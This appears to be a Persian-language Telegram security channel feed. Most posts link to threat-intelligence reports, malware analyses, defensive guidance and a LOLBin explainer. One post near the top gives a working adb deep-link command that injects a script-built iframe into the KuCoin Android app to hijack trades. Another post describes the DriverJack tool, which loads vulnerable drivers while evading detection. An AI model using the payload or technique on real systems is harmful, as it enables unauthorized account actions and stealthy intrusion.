This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
📎 BlogPost
@Engineer_Computer
#Android
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'
📎 BlogPost
@Engineer_Computer
#Android
یکی از دغدغه های مدیران و متخصصان امنیت در زمان حادثه اینه که داده ها چقدر و چطور از سازمان خارج شده اند
سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید
#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting
https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c
@Engineer_Computer
سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید
#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting
https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c
@Engineer_Computer
Medium
Data Exfiltration: Questions and How to Answer Them
An Incident Responder insights and stories on how to approach data exfiltration
مقاله زیر رو انتخاب کردم واسه کسایی که میخوان عملکرد EDR رو درک کنند
https://synzack.github.io/Blinding-EDR-On-Windows/
@Engineer_Computer
https://synzack.github.io/Blinding-EDR-On-Windows/
@Engineer_Computer
Red Team Blog
Blinding EDR On Windows
Acknowledgements My understanding of EDRs would not be possible without the help of many great security researchers. Below are some write-ups and talks that really helped me gain the understanding needed and hit the ground running on the research that will…
گزارش های مندینت
خواندنی و مهم
این بار آلوده سازی از طریق PDF
https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/?linkId=10998021
@Engineer_Computer
خواندنی و مهم
این بار آلوده سازی از طریق PDF
https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/?linkId=10998021
@Engineer_Computer
Google Cloud Blog
An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader | Google Cloud Blog
UNC2970 is a cyber espionage group suspected to have a North Korea nexus.
یک گزارش تحلیل بدافزار جالب بخونیم
#امنیت_سایبری #پاورشل #securityawareness #cybersecurity
** تعطیلات ، از سرمایه مهم هستند برای ارتقای شغلی شما . دریابید.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
@Engineer_Computer
#امنیت_سایبری #پاورشل #securityawareness #cybersecurity
** تعطیلات ، از سرمایه مهم هستند برای ارتقای شغلی شما . دریابید.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
@Engineer_Computer
Securelist
SambaSpy – a new RAT targeting Italian users
Kaspersky researchers detected a campaign exclusively targeting Italian users by delivering a new RAT dubbed SambaSpy
سلام
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
👍1
گزارشی از فعالیت یک گروه منتسب به ایران
جدید
https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks
@Engineer_Computer
جدید
https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks
@Engineer_Computer
Google Cloud Blog
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks | Google Cloud Blog
UNC1860 is an Iranian state-sponsored threat actor with specialized tooling and passive backdoors.
❤1
همیشه از پایه بخوانیم.
تنظیم لاگ در ویندوز
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/monitoring-active-directory-for-signs-of-compromise
@Engineer_Computer
تنظیم لاگ در ویندوز
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/monitoring-active-directory-for-signs-of-compromise
@Engineer_Computer
Docs
Monitoring Active Directory for Signs of Compromise
Learn about event log monitoring in Active Directory to improve security
👍1
مجموعه مقالات #امنیت_به_زبان_ساده
دو واژه : LoLBin و LOLBAS
انجام هک در سالها پیش از اقلام محدودی تشکیل شده بود. یعنی هکر با یک یا دو عمل ، ویروسی می نوشت و تخریب مد نظر را انجام میداد یا با هک یک وبسایت به کل دارایی های سازمان تسلط می یافت.
روز به روز به تکنیک های هک افزوده شد و آن تکنیک هاپیچیده شدند و درقالب تاکتیک هایی تجمیع گردیدند. در طرف مقابل تیم امنیت هم بر توان و قدرت دفاعی و کشفی خود افزود. این شد که نفوذ برای دزدی یا تخریب اطلاعات مشکل شد.
در این بین بدلیل مهاجرت سازمانها به فضای دیجیتال ، بخش عمده ای از سازمان به فضای سایبری منتقل شدند. و این سطح تاثیر سازمان از هکر ها را افزایش داد.
لذا سازمانها سعی کردند با پیاده سازی مکانیسم دفاع لایه ای به مقابله با نفوذ بپردازند به نحوی که با وجود گسترش فضای دیجیتال در سازمان؛ حجم ریسکها کنترل شده باقی بماند.
در این بین هکرها راهی جدید برای نفوذ پیدا کردند. اصولا امروزه هک شامل یک یا دو قدم معدود نمیشود و انجام هک در سازمان شامل چندین پله و شامل فرآیند است. که مجموعه آنرا میتوانید در جدول ATT&CK ملاحظه کنید.
در روشهای نفوذ جدید ؛ هکر ها از ابزارهای موجود روی سیستم های سازمان علیه خود سازمان استفاده میکنند.
این روش چه مزیتی دارد ؟
اول اینکه این ابزار ها کاملا در دسترس هستند و نیازی به انتقال آنها به شبکه و سیستم قربانی نیست.
دوم اینکه سیستمهای امنیتی به این اقلام اعتماد دارند.
سوم اینکه با استفاده از این ها ، رد پای کمتری باقی میماند و جرم شناسی و شکار توسط امنیت چی ها سخت میشود.
البته نکات دیگری در این میان هست که فعلا برای جلوگیری از اطاله کلام از آنها چشم پوشی میکنم تا لب مطلب اخذ گردد.
حالا برویم سراغ واژه ای که در ابتدای متن گفته شد:
به مجموعه ای از باینری هایی که در سیستم های سازمان وجود دارد و ما به آنها اعتماد داریم ولی در طول سالها از آنها سوء استفاده شده است LoLBin و LOLBAS گفته میشود یعنی :
Living of the land binary
این یعنی هکر در مراحلی از نفوذ خودش؛ ابزارهای نفوذ را میسازد یا از جایی تهیه میکند ولی در مراحل دیگری از نفوذ ، او از این مجموعه باینری خود سیستم عامل یا سامانه برای تقویت یا افزایش نفوذ و یا اقداماتی چون خروج داده از سازمان و یا رمزنگاری آنها استفاده میکند.
این مساله مشکلی در راه مقابله و کشف نفوذ ایحاد کرده است. البته در SOC ها راهکارهایی برای این موضوع پیاده میشود.
لیست این پاینری ها در پروژه ای جمع آوری شده است که در لینک زیر آنها را ببینید.
https://lolbas-project.github.io/#
#آموزش #امنیت #امنیت_سایبری
#امنیت_به_زبان_ساده
#cybersecurity #threathunting #cyberforensics
🔆 برای آگاهی دیگران ، دانش را نشر دهید و این پست را فوروارد کنید
@Engineer_Computer
دو واژه : LoLBin و LOLBAS
انجام هک در سالها پیش از اقلام محدودی تشکیل شده بود. یعنی هکر با یک یا دو عمل ، ویروسی می نوشت و تخریب مد نظر را انجام میداد یا با هک یک وبسایت به کل دارایی های سازمان تسلط می یافت.
روز به روز به تکنیک های هک افزوده شد و آن تکنیک هاپیچیده شدند و درقالب تاکتیک هایی تجمیع گردیدند. در طرف مقابل تیم امنیت هم بر توان و قدرت دفاعی و کشفی خود افزود. این شد که نفوذ برای دزدی یا تخریب اطلاعات مشکل شد.
در این بین بدلیل مهاجرت سازمانها به فضای دیجیتال ، بخش عمده ای از سازمان به فضای سایبری منتقل شدند. و این سطح تاثیر سازمان از هکر ها را افزایش داد.
لذا سازمانها سعی کردند با پیاده سازی مکانیسم دفاع لایه ای به مقابله با نفوذ بپردازند به نحوی که با وجود گسترش فضای دیجیتال در سازمان؛ حجم ریسکها کنترل شده باقی بماند.
در این بین هکرها راهی جدید برای نفوذ پیدا کردند. اصولا امروزه هک شامل یک یا دو قدم معدود نمیشود و انجام هک در سازمان شامل چندین پله و شامل فرآیند است. که مجموعه آنرا میتوانید در جدول ATT&CK ملاحظه کنید.
در روشهای نفوذ جدید ؛ هکر ها از ابزارهای موجود روی سیستم های سازمان علیه خود سازمان استفاده میکنند.
این روش چه مزیتی دارد ؟
اول اینکه این ابزار ها کاملا در دسترس هستند و نیازی به انتقال آنها به شبکه و سیستم قربانی نیست.
دوم اینکه سیستمهای امنیتی به این اقلام اعتماد دارند.
سوم اینکه با استفاده از این ها ، رد پای کمتری باقی میماند و جرم شناسی و شکار توسط امنیت چی ها سخت میشود.
البته نکات دیگری در این میان هست که فعلا برای جلوگیری از اطاله کلام از آنها چشم پوشی میکنم تا لب مطلب اخذ گردد.
حالا برویم سراغ واژه ای که در ابتدای متن گفته شد:
به مجموعه ای از باینری هایی که در سیستم های سازمان وجود دارد و ما به آنها اعتماد داریم ولی در طول سالها از آنها سوء استفاده شده است LoLBin و LOLBAS گفته میشود یعنی :
Living of the land binary
این یعنی هکر در مراحلی از نفوذ خودش؛ ابزارهای نفوذ را میسازد یا از جایی تهیه میکند ولی در مراحل دیگری از نفوذ ، او از این مجموعه باینری خود سیستم عامل یا سامانه برای تقویت یا افزایش نفوذ و یا اقداماتی چون خروج داده از سازمان و یا رمزنگاری آنها استفاده میکند.
این مساله مشکلی در راه مقابله و کشف نفوذ ایحاد کرده است. البته در SOC ها راهکارهایی برای این موضوع پیاده میشود.
لیست این پاینری ها در پروژه ای جمع آوری شده است که در لینک زیر آنها را ببینید.
https://lolbas-project.github.io/#
#آموزش #امنیت #امنیت_سایبری
#امنیت_به_زبان_ساده
#cybersecurity #threathunting #cyberforensics
🔆 برای آگاهی دیگران ، دانش را نشر دهید و این پست را فوروارد کنید
@Engineer_Computer
استفاده از هوش مصنوعی در تحلیل بد افزار و مهندسی معکوس
راه انداری یک open source disassembler
https://cryptax.medium.com/using-ai-assisted-decompilation-of-radare2-e81a882863c9
@Engineer_Computer
راه انداری یک open source disassembler
https://cryptax.medium.com/using-ai-assisted-decompilation-of-radare2-e81a882863c9
@Engineer_Computer
Medium
Using AI-assisted decompilation of Radare2
A few months ago, Radare2 (aka r2), an open source disassembler which can be entirely used by command line, started implementing AI plugins…
باج افزاری که از بیت لاکر ویندوز علیه ما استفاده میکند
به همراه کانتنت های اسپلانک
#اسپلانک #امنیت
#splunk
https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html?utm_source=linkedin&utm_medium=social-media&linkId=594262321
@Engineer_Computer
به همراه کانتنت های اسپلانک
#اسپلانک #امنیت
#splunk
https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html?utm_source=linkedin&utm_medium=social-media&linkId=594262321
@Engineer_Computer
Splunk
ShrinkLocker Malware: Abusing BitLocker to Lock Your Data | Splunk
The Splunk Threat Research Team shares their findings and methodologies to aid the cybersecurity community in combating ShrinkLocker effectively.
گزارش ISC2
آنچه نیروی کار امنیت فکر میکند بازار نیاز دارد
آنچه استخدام کنندگان میخواهند
https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen
@Engineer_Computer
آنچه نیروی کار امنیت فکر میکند بازار نیاز دارد
آنچه استخدام کنندگان میخواهند
https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen
@Engineer_Computer
Forwarded from Network Security Channel
سلام
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
❤2🔥2
گزارش تحلیلی باج افزار بخوانیم.
جدید
https://www.huntress.com/blog/readtext34-ransomware-incident
@Engineer_Computer
جدید
https://www.huntress.com/blog/readtext34-ransomware-incident
@Engineer_Computer
Huntress
ReadText34 Ransomware Incident | Huntress
Huntress analysts see a number of attacks on a daily and weekly basis, some of which include ransomware attacks. Now and again, Huntress analysts will observe a ransomware attack that stands out in some novel manner.
❤1
در این حمله چین تارگت شد.
لینک گزارش حمله در زیر
مطالعه گزارش رو برای سطح ۲ مرکز عملیات امنیت توصیه میکنم
https://www.trendmicro.com/en_no/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
**از جایی به بعد دوره رفتن کمتر لازمه و بهتره چنین گزارش هایی دائم پیگیری بشه
#cybersecurity #threathunting #securityawareness #risk
@Engineer_Computer
لینک گزارش حمله در زیر
مطالعه گزارش رو برای سطح ۲ مرکز عملیات امنیت توصیه میکنم
https://www.trendmicro.com/en_no/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
**از جایی به بعد دوره رفتن کمتر لازمه و بهتره چنین گزارش هایی دائم پیگیری بشه
#cybersecurity #threathunting #securityawareness #risk
@Engineer_Computer
❤1👍1
♨️ ابزار DriverJack به منظور بارگذاری یک درایور آسیبپذیر در سیستم از تکنیکهای کمتر شناخته شده NTFS استفاده میکند. هدف اصلی این ابزار، دور زدن روشهای معمول برای ثبت و بارگذاری درایورها در سیستم است. این ابزار با ربودن سرویسهای موجود و جعل مسیرهای درایور، میتواند موفق به پنهانسازی درایور مخرب شود.
☠️ مراحل کلیدی حمله
🦠 دور زدن ثبت سرویس درایور
این روش به مهاجم اجازه میدهد که بدون نیاز به ثبت سرویس درایور جدید، از سرویسهای موجود در سیستم سوءاستفاده کند و درایور آسیبپذیر را بارگذاری کند
🦠 جعل مسیر درایور
در هنگام بارگذاری درایور، مسیر فایل درایور بهگونهای جعل میشود که به نظر برسد فایل درایور از مسیری دیگر (مثلاً یک فایل ISO نصب شده) بارگذاری شده است. این کار تشخیص درایور مخرب را توسط سیستمهای نظارتی دشوارتر میکند
🦠 سوءاستفاده از سیستم فایل شبیهسازی شده (Emulated Filesystem)
ابزار DriverJack همچنین از یک ضعف در سیستم فایل استفاده میکند که به آن امکان میدهد فایلهای موجود روی فایلسیستمهای شبیهسازی شده (مثل ISO) را به صفحاتی قابل نوشتن (RW) مجدد تبدیل کند و محتوای آنها را تغییر دهد. این تکنیک به عنوان "Read-Only Bypass" شناخته میشود و در کتابخانه IoCdfsLib پیادهسازی شده است.
📚 در سیستمعامل ویندوز، فایلها و دایرکتوریها میتوانند به صورت شبیهسازی شده (Emulated) بارگذاری شوند. این یعنی فایلها میتوانند از طریق فایلهای ایمیج، مانند فایلهای ISO، به سیستم معرفی شوند و به نظر برسد که بخشی از سیستم فایل عادی هستند. به عنوان مثال، وقتی یک فایل ISO را روی سیستم باز میکنید، محتوای آن به صورت یک درایو مجازی (مثل درایو CD) در سیستم نمایش داده میشود و این درایو به طور معمول فقط خواندنی (Read-Only) است، یعنی نمیتوانید محتویات آن را تغییر دهید.
💢 این ابزار با استفاده از کتابخانه IoCdfsLib ، فایلهای موجود در این درایو مجازی را از حالت فقط خواندنی به قابل نوشتن تبدیل میکند
سپس محتوای این فایلها را تغییر میدهد تا درایور مخرب خود را جایگزین فایلهای معتبر کند.
🕷 پس از دستکاری فایلها، درایور مخرب به عنوان یک فایل معتبر از درایو ISO بارگذاری میشود، و این فرآیند به سیستم اجازه میدهد تا بدون تشخیص مخرب بودن، این درایور را بارگذاری کند.
👁🗨 https://github.com/klezVirus/DriverJack
#tools
#RedTeam
@Engineer_Computer
☠️ مراحل کلیدی حمله
🦠 دور زدن ثبت سرویس درایور
این روش به مهاجم اجازه میدهد که بدون نیاز به ثبت سرویس درایور جدید، از سرویسهای موجود در سیستم سوءاستفاده کند و درایور آسیبپذیر را بارگذاری کند
🦠 جعل مسیر درایور
در هنگام بارگذاری درایور، مسیر فایل درایور بهگونهای جعل میشود که به نظر برسد فایل درایور از مسیری دیگر (مثلاً یک فایل ISO نصب شده) بارگذاری شده است. این کار تشخیص درایور مخرب را توسط سیستمهای نظارتی دشوارتر میکند
🦠 سوءاستفاده از سیستم فایل شبیهسازی شده (Emulated Filesystem)
ابزار DriverJack همچنین از یک ضعف در سیستم فایل استفاده میکند که به آن امکان میدهد فایلهای موجود روی فایلسیستمهای شبیهسازی شده (مثل ISO) را به صفحاتی قابل نوشتن (RW) مجدد تبدیل کند و محتوای آنها را تغییر دهد. این تکنیک به عنوان "Read-Only Bypass" شناخته میشود و در کتابخانه IoCdfsLib پیادهسازی شده است.
📚 در سیستمعامل ویندوز، فایلها و دایرکتوریها میتوانند به صورت شبیهسازی شده (Emulated) بارگذاری شوند. این یعنی فایلها میتوانند از طریق فایلهای ایمیج، مانند فایلهای ISO، به سیستم معرفی شوند و به نظر برسد که بخشی از سیستم فایل عادی هستند. به عنوان مثال، وقتی یک فایل ISO را روی سیستم باز میکنید، محتوای آن به صورت یک درایو مجازی (مثل درایو CD) در سیستم نمایش داده میشود و این درایو به طور معمول فقط خواندنی (Read-Only) است، یعنی نمیتوانید محتویات آن را تغییر دهید.
💢 این ابزار با استفاده از کتابخانه IoCdfsLib ، فایلهای موجود در این درایو مجازی را از حالت فقط خواندنی به قابل نوشتن تبدیل میکند
سپس محتوای این فایلها را تغییر میدهد تا درایور مخرب خود را جایگزین فایلهای معتبر کند.
🕷 پس از دستکاری فایلها، درایور مخرب به عنوان یک فایل معتبر از درایو ISO بارگذاری میشود، و این فرآیند به سیستم اجازه میدهد تا بدون تشخیص مخرب بودن، این درایور را بارگذاری کند.
👁🗨 https://github.com/klezVirus/DriverJack
#tools
#RedTeam
@Engineer_Computer
GitHub
GitHub - klezVirus/DriverJack: Hijacking valid driver services to load arbitrary (signed) drivers abusing native symbolic links…
Hijacking valid driver services to load arbitrary (signed) drivers abusing native symbolic links and NT paths - klezVirus/DriverJack
❤1
⭕️ از سال 2020، گروههای هکری وابسته به چین به دستگاههای edge مانند فایروالها، VPNها و دستگاههای اینترنت اشیا (IoT) در زیرساختهای دولتی تایوان نفوذ کردند
این هکرها با استفاده از آسیبپذیریهای (0-day) در دستگاههایی مانند فایروالهای Sophos و VPNهای Array SSL، از این دستگاهها برای ایجاد باتنتها، پخش اطلاعات نادرست و سرقت دادههای حساس استفاده میکنند.
🔺 این حملات شامل تکنیکهای پیشرفتهای مانند بکدورهای مبتنی بر port-knocking و سو استفاده از (LoLbin) هستند که به مهاجمان اجازه میدهد تا بدون شناسایی توسط نرمافزارهای امنیتی به سیستمها نفوذ کنند و کنترل آنها را به دست بگیرند.
♨️ در این ارائه، نمونههای واقعی از دستگاههای edge که توسط این حملات هدف قرار گرفتهاند و راههای مقابله با این تهدیدات را بررسی خواهد کرد.
🌐 https://www.youtube.com/watch?v=PSaix1C-UMI
Slides: https://teamt5.org/en/posts/black-hat-asia-2024/
#RedTeam
#APT
#Black_Hat_Asia_2024
@Engineer_Computer
این هکرها با استفاده از آسیبپذیریهای (0-day) در دستگاههایی مانند فایروالهای Sophos و VPNهای Array SSL، از این دستگاهها برای ایجاد باتنتها، پخش اطلاعات نادرست و سرقت دادههای حساس استفاده میکنند.
🔺 این حملات شامل تکنیکهای پیشرفتهای مانند بکدورهای مبتنی بر port-knocking و سو استفاده از (LoLbin) هستند که به مهاجمان اجازه میدهد تا بدون شناسایی توسط نرمافزارهای امنیتی به سیستمها نفوذ کنند و کنترل آنها را به دست بگیرند.
♨️ در این ارائه، نمونههای واقعی از دستگاههای edge که توسط این حملات هدف قرار گرفتهاند و راههای مقابله با این تهدیدات را بررسی خواهد کرد.
🌐 https://www.youtube.com/watch?v=PSaix1C-UMI
Slides: https://teamt5.org/en/posts/black-hat-asia-2024/
#RedTeam
#APT
#Black_Hat_Asia_2024
@Engineer_Computer
YouTube
Chinese APT: A Master of Exploiting Edge Devices
China-nexus actors have compromised edge devices such as firewall, VPN, IoT devices, etc. against Taiwan Government since 2020 during COVID19, and have compromised those devices to build Botnet, spread disinformation, and exfiltrate sensitive data. However…
tools
Offensive security
1. Loading BOF on Linux
https://lnkd.in/dawuC5mv
2. Ransomware Tool Matrix
https://lnkd.in/dcYxh6Hp
3. cryptography
Project Wycheproof tests crypto libraries against known attacks
https://lnkd.in/dhAgnijc
@Engineer_Computer
Offensive security
1. Loading BOF on Linux
https://lnkd.in/dawuC5mv
2. Ransomware Tool Matrix
https://lnkd.in/dcYxh6Hp
3. cryptography
Project Wycheproof tests crypto libraries against known attacks
https://lnkd.in/dhAgnijc
@Engineer_Computer
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn